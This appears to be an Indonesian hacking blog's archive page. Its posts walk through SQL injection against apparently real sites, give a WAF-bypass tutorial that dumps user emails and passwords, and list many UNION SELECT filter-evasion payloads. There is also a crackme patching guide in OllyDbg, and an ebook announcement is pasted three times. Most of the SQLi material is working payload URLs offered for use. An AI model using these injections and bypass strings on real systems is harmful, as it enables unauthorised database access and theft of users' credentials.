Subscribe:

Ads 468x60px

Rabu, 26 Februari 2014

SQL Injection 'order by 10000' and still not error?


assalamualaikum
okay sesuai judul
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak mengkasilakan apa2

target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2












coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya













wew pas di kecilin muncul lagi tulisan nya














berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya













coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -













dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya

udah gitu aja, semoga bermanfaat

Kamis, 30 Januari 2014

Bypass WAF filter in SQLI


assalamualaikum
kali ini tentang bagaimana membypass filter waf pada bug sqli

secara manual, kenapa manual soal nya sqlmap nya lg bobo :P
okay langsung aja
target:
http://www.target.com/ebookcontents.php?id=95'













yaps bug sqli
kemudian lanjut dah pake perintah "order by" , cari kolom nya
http://www.target.com/ebookcontents.php?id=95 order by 7--
Unknown column '7' in 'order clause'











lanjut sampe dapat :D
ternyata ada 6 kolom
http://www.target.com/ebookcontents.php?id=95 order by 6--


terus cari angka ajaib nya dengan perintah "union select"
http://www.target.com/ebookcontents.php?id=95 union select 1,2,3,4,5,6--
dan hasil nya Not Acceptable kemungkinan ada waf, mari kita coba bypass
kita ganti kata "union select" dengan
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,3,4,5,6--













ew bisa di buka ternyata, disini saya memilih angka 3 :D
coba kita liat versi mysql berapa dia
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,version(),4,5,6--
dia pake versi 5.5.34-cll













lanjut dah kita liat isi database nya dengan perintah
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,group_concat(table_name)(0x3c62723e,table_name)*/,4,5,6 from information_schema.tables where table_schema=database()--
dan hasil nya  Not Acceptable, mungkin harus alay kali yah syntax nya, kita coba dengan cara ini

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(0x3c62723e,table_name)*/,4,5,6 +from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
dan hasil nya












heheh bisa dah, ada banyak isi "database" nya, mari kita fokus pada database "users"
masukkan perintah ini

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(Group_Concat(table_name))*/,4,5,6 from information_schema.tables where table_schema=database()--

hemm banyak table nya uyy,
disini saya memilih table "users"













http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!column_name*/)),4,5,6 from /*!information_schema*/.columns where /*!table_name*/=0x7573657273--+

dan hasil nya ada id,email,password,date












mari kita dump :P

http://www.trnres.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!email,0x3a,password*/)),4,5,6/*!from*/ /*!users*/

dan hasil nya












bonus dah













tips dan trik
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

And


UNION SELECT Bypassing ::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only


after id no. like id=1 +/*!and*/+1=0

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

ok semoga bermanfaat

Jumat, 13 Desember 2013

Basic with olldyDbg


assalamualaikum
ijin coret-coret ya, mumpung gak ada yang liat
kita akan berlatih reverse engineering
kita coba memecahkan ini











terlihat dari gambar kita belum bisa memecahkan nya
oke sekarang buka olldbg nya










terus klik file>open> dan pilih file yg mau anda buka tadi
liat penampakan










nahh itu adalah penampakan yg mau kita obok aka crack :v
terus perhatikan gambar aja ya
terus klik kanan>search for> all referenced text string
hasilnya










dan ini setelah di klik tadi
kemudian perhatikan yg di garis merah, itu kata2 nya sama seperti pas mau buka tadi kan di gambar awal










terus kita klik yg di kasih garis merah
nah di lihat dari gambar ada tulisan you didn't crack me yet










kita mengganti String JE (Jump If Equal) menjadi JMP (Jump) di dalam struktur program yang di crack. Jadi semua perintah dalam blok JE atau dalam bahasa pemrograman adalah “IF” di dalam struktur kode program akan di lewati
klik 2x ya

ubah JE menjadi JMP
liat gambar










terus klik assemble dan cancel kalo sudah

perhatikan gambar lagi dan perintah nya
klik kanan>copy to exutable>all modifications>copy all










terus kalo sudah hasilnya gini










nahh setelah itu
klik kanan>backup>save data to file ( liat gambar)










terus simpan dg nama kesukaan anda
misalnya bukanapa.exe :D

hasilnya










oke sekian semoga bermanfaat
video nya http://www.youtube.com/watch?v=0L0vTHzw5yY
download crackme KLIK

Kamis, 28 November 2013

Download Ebook Technology, Security, Linux, Program, Pentest, etc


Download Ebook about technology, security, linux, program, pentest, etc

- WH-WhitePaper_XST_ebook download 
- Finding_LFI_and_RFI download 


- DesktopCentral Arbitrary File Upload download
- understanding the linux kernel download
- Fundamentals Of Web Design download
- Hacking: The Art of Exploitation, 2nd Edition download
- devilzc0de-ezine-volume-2.pdf download 
- devilzc0de-ezine-volume-3.pdf download 

Selasa, 22 Oktober 2013

Attacking Side With BackTrack Vol 2 by Zico Ekel


E-book Attacking side with backtrack versi 2 telah di release. Sukses dengan ASWB versi 1 IBTeam meluncurkan ASWB versi 2 dengan memperbaiki konten2 yang ada pada E-book ASWB versi 1.

Sinopsis :

E-book ini berisi berbagai tehnik penetration testing dengan menggunakan BackTrack OS. Untuk versi 2 ada beberapa fitur tambahan yang melengkapi ASWB v1 juga di sesuaikan dengan penggunaan backtrack versi terbaru yaitu BackTrack 5 Release 3.

KONTEN UTAMA

BAB 1 PENGENALAN BACKTRACK
BAB 2 NETWORKING WITH BACKTRACK
BAB 3 KNOWING SERVICE ON BACKTRACK
BAB 4 INFORMATION GATHERING
BAB 4 HIDE THE INFORMATION
BAB 6 MAN IN THE MIDDLE ATTACK
BAB 7 CRACKING PARAMETER
BAB 8 WIFIFU
BAB 9 STRESS TESTING
BAB 10 WEB ATTACK
BAB 11 MAINTAINING ACCESS
BAB 12 METASPLOIT
BAB 12 FORENSICS TOOLS IN BACKTRACK

Tipe : pdf

Jumlah halaman : 518 halaman

Kami dalam persiapan untuk mendesign tampilan walau team penulis telah selesai membuat materinya dan telah masuk 2 kali proses editing. Untuk itu kami menyampaikan terlebih dahulu kepada seluruh Backtracker yang hendak mendownload buku tersebut agar mempersiapkan diri terlebih dahulu.

Community Power

Buku ini jauh dari kesempurnaan karena itu, Untuk mencapai kesempurnaan buku ini lebih lanjut, maka teman-teman yang sudah membaca buku ini harap meninggalkan komentar dan kritikan. Serta usulan untuk penambahan materi pada ASWB versi 3.

Saya pun membuka sub forum untuk membahas apa yang tidak di mengerti pada versi ini atau ada yang tidak sesuai dengan konten ( kegagalan praktek )

Semuanya dapat teman-teman akses pada

http://indonesianbacktrack.or.id/forum/forumdisplay.php?fid=207

saya berterima kasih kepada Tengku Aditya Maulana dan Dhodoy Saos Tiram
Yang telah membantu membuatkan cover ASWB.

Terima kasih kepada : Pembina kita Iwan Sumantri , idblackhat.org, njepatcrew, bekasi cyber and all crew

NB : DIHARAPKAN ANDA TIDAK MEMBUAT MIRROR SAMPAI ASWB V3 DI RELEASE. TERIMA KASIH

http://zico-ekel.com » Attacking Side With BackTrack Vol 2 by Zico Ekel
Zico Ekel E-book Attacking side with backtrack versi 2 telah di release. Sukses dengan ASWB versi 1 IBTeam meluncurkan ASWB versi 2 dengan memperbaiki konten2 yang ada pada E-book ASWB versi 1.
Sinopsis :
E-book ini berisi berbagai tehnik penetration testing dengan menggunakan BackTrack OS. Untuk versi 2 ada beberapa fitur tambahan yang melengkapi ASWB v1 juga di sesuaikan dengan penggunaan backtrack versi terbaru yaitu BackTrack 5 Release 3.
KONTEN UTAMA
BAB 1 PENGENALAN BACKTRACK
BAB 2 NETWORKING WITH BACKTRACK
BAB 3 KNOWING SERVICE ON BACKTRACK
BAB 4 INFORMATION GATHERING
BAB 4 HIDE THE INFORMATION
BAB 6 MAN IN THE MIDDLE ATTACK
BAB 7 CRACKING PARAMETER
BAB 8 WIFIFU
BAB 9 STRESS TESTING
BAB 10 WEB ATTACK
BAB 11 MAINTAINING ACCESS
BAB 12 METASPLOIT
BAB 12 FORENSICS TOOLS IN BACKTRACK
Tipe : pdf
Jumlah halaman : 518 halaman
Kami dalam persiapan untuk mendesign tampilan walau team penulis telah selesai membuat materinya dan telah masuk 2 kali proses editing. Untuk itu kami menyampaikan terlebih dahulu kepada seluruh Backtracker yang hendak mendownload buku tersebut agar mempersiapkan diri terlebih dahulu.
Community Power
Buku ini jauh dari kesempurnaan karena itu, Untuk mencapai kesempurnaan buku ini lebih lanjut, maka teman-teman yang sudah membaca buku ini harap meninggalkan komentar dan kritikan. Serta usulan untuk penambahan materi pada ASWB versi 3.
Saya pun membuka sub forum untuk membahas apa yang tidak di mengerti pada versi ini atau ada yang tidak sesuai dengan konten ( kegagalan praktek )
Semuanya dapat teman-teman akses pada
http://indonesianbacktrack.or.id/forum/forumdisplay.php?fid=207
- See more at: http://zico-ekel.com/book-review/attacking-side-with-backtrack-vol-2/#sthash.u1EReczn.dpuf
http://zico-ekel.com » Attacking Side With BackTrack Vol 2 by Zico Ekel
Zico Ekel E-book Attacking side with backtrack versi 2 telah di release. Sukses dengan ASWB versi 1 IBTeam meluncurkan ASWB versi 2 dengan memperbaiki konten2 yang ada pada E-book ASWB versi 1.
Sinopsis :
E-book ini berisi berbagai tehnik penetration testing dengan menggunakan BackTrack OS. Untuk versi 2 ada beberapa fitur tambahan yang melengkapi ASWB v1 juga di sesuaikan dengan penggunaan backtrack versi terbaru yaitu BackTrack 5 Release 3.
KONTEN UTAMA
BAB 1 PENGENALAN BACKTRACK
BAB 2 NETWORKING WITH BACKTRACK
BAB 3 KNOWING SERVICE ON BACKTRACK
BAB 4 INFORMATION GATHERING
BAB 4 HIDE THE INFORMATION
BAB 6 MAN IN THE MIDDLE ATTACK
BAB 7 CRACKING PARAMETER
BAB 8 WIFIFU
BAB 9 STRESS TESTING
BAB 10 WEB ATTACK
BAB 11 MAINTAINING ACCESS
BAB 12 METASPLOIT
BAB 12 FORENSICS TOOLS IN BACKTRACK
Tipe : pdf
Jumlah halaman : 518 halaman
Kami dalam persiapan untuk mendesign tampilan walau team penulis telah selesai membuat materinya dan telah masuk 2 kali proses editing. Untuk itu kami menyampaikan terlebih dahulu kepada seluruh Backtracker yang hendak mendownload buku tersebut agar mempersiapkan diri terlebih dahulu.
Community Power
Buku ini jauh dari kesempurnaan karena itu, Untuk mencapai kesempurnaan buku ini lebih lanjut, maka teman-teman yang sudah membaca buku ini harap meninggalkan komentar dan kritikan. Serta usulan untuk penambahan materi pada ASWB versi 3.
Saya pun membuka sub forum untuk membahas apa yang tidak di mengerti pada versi ini atau ada yang tidak sesuai dengan konten ( kegagalan praktek )
Semuanya dapat teman-teman akses pada
http://indonesianbacktrack.or.id/forum/forumdisplay.php?fid=207
- See more at: http://zico-ekel.com/book-review/attacking-side-with-backtrack-vol-2/#sthash.u1EReczn.dpuf
http://zico-ekel.com » Attacking Side With BackTrack Vol 2 by Zico Ekel
Zico Ekel E-book Attacking side with backtrack versi 2 telah di release. Sukses dengan ASWB versi 1 IBTeam meluncurkan ASWB versi 2 dengan memperbaiki konten2 yang ada pada E-book ASWB versi 1.
Sinopsis :
E-book ini berisi berbagai tehnik penetration testing dengan menggunakan BackTrack OS. Untuk versi 2 ada beberapa fitur tambahan yang melengkapi ASWB v1 juga di sesuaikan dengan penggunaan backtrack versi terbaru yaitu BackTrack 5 Release 3.
KONTEN UTAMA
BAB 1 PENGENALAN BACKTRACK
BAB 2 NETWORKING WITH BACKTRACK
BAB 3 KNOWING SERVICE ON BACKTRACK
BAB 4 INFORMATION GATHERING
BAB 4 HIDE THE INFORMATION
BAB 6 MAN IN THE MIDDLE ATTACK
BAB 7 CRACKING PARAMETER
BAB 8 WIFIFU
BAB 9 STRESS TESTING
BAB 10 WEB ATTACK
BAB 11 MAINTAINING ACCESS
BAB 12 METASPLOIT
BAB 12 FORENSICS TOOLS IN BACKTRACK
Tipe : pdf
Jumlah halaman : 518 halaman
Kami dalam persiapan untuk mendesign tampilan walau team penulis telah selesai membuat materinya dan telah masuk 2 kali proses editing. Untuk itu kami menyampaikan terlebih dahulu kepada seluruh Backtracker yang hendak mendownload buku tersebut agar mempersiapkan diri terlebih dahulu.
Community Power
Buku ini jauh dari kesempurnaan karena itu, Untuk mencapai kesempurnaan buku ini lebih lanjut, maka teman-teman yang sudah membaca buku ini harap meninggalkan komentar dan kritikan. Serta usulan untuk penambahan materi pada ASWB versi 3.
Saya pun membuka sub forum untuk membahas apa yang tidak di mengerti pada versi ini atau ada yang tidak sesuai dengan konten ( kegagalan praktek )
Semuanya dapat teman-teman akses pada
http://indonesianbacktrack.or.id/forum/forumdisplay.php?fid=207
- See more at: http://zico-ekel.com/book-review/attacking-side-with-backtrack-vol-2/#sthash.u1EReczn.dpuf